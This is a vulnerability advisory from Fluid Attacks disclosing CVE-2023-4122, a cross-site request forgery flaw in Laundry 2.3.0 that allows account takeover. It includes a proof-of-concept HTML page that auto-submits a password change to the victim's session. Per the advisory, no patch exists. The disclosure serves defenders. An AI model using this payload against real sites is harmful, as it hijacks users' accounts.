---
slug: advisories/tort/
title: CSRF in laundry allows to perform an account takeover
authors: Carlos Bello
writer: cbello
codename: tort
product: CSRF in laundry allows to perform an account takeover
date: 2023-10-05 12:00 COT
cveid: CVE-2023-4122
severity: 8.8
description: CSRF in laundry allows to perform an account takeover
keywords: Fluid Attacks, Security, Vulnerabilities, CSRF, Laundry, CVE
banner: advisories-bg
advise: yes
template: maskedAdvisory
encrypted: yes
---

## Summary

<summary-table
    name="CSRF in laundry allows to perform an account takeover"
    code="[Tort](https://www.last.fm/music/David+Tort/+wiki)"
    product="Laundry"
    affected-versions="Version 2.3.0"
    fixed-versions=""
    state="Public"
    release="2023-10-05">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Cross-site request forgery"
    rule="[007. Cross-site request forgery](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-007/)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
    score="8.8"
    available="Yes"
    id="[CVE-2023-4122](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4122)">
</vulnerability-table>

## Description

Laundry version 2.3.0 allows to perform an account takeover.
This is possible because the application is vulnerable to CSRF.

## Vulnerability

An CSRF vulnerability has been identified in laundry. This allows
an account takeover to be performed on any user accessing a malicious
link.

## Exploit

```html
<!DOCTYPE html>
<html>
    <body>
        <form action="http://vulnerable.com/laundry/data/change_pass.php" method="POST">
            <input type="hidden" name="pwd" value="hacked">
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>
```

## Evidence of exploitation

![evidence1](https://user-images.githubusercontent.com/51862990/270804326-6bfacea2-b529-4c39-aad1-573204c0ab0b.png)

![evidence2](https://user-images.githubusercontent.com/51862990/270804490-93dccbb8-ac8f-42fd-a2c8-89a009bc3717.png)

## Our security policy

We have reserved the ID CVE-2023-4122 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: laundry 2.3.0

* Operating System: GNU/Linux

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://github.com/mohaiminur/laundry/>

## Timeline

<time-lapse
  discovered="2023-09-26"
  contacted="2023-09-26"
  replied=""
  confirmed=""
  patched=""
  disclosure="2023-10-05">
</time-lapse>
